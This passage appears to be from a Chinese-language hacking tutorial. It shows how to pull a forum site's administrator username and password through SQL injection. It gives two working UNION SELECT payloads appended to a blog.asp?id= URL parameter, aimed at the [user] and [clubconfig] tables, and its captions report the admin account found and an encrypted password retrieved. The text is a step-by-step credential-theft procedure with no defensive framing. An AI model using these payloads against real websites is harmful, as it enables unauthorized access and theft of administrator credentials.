通过构造语句查看管理员密码
接下来从中随便单击一个论坛进入,然后构造一个查看管理员用户名的语句,这里在网站域名后面输入blog.asp?id=1 union select top 1 1,[username],1,1,1,1,1 from [user]回车后,就可查询到管理员的用户名(图2)。
图2 查询到Xf管理员用户
然后我们在构造查看其管理员用户的密码语句,在地址栏处使用blog.asp?id=1 union select top 1 1,[adminpassword],1,1,1,1,1 from [clubconfig]替换上方查询用户名语句后,回车便可快速查看到其相对应的管理员密码(图3)。
图3 结果得到的密码被加密了
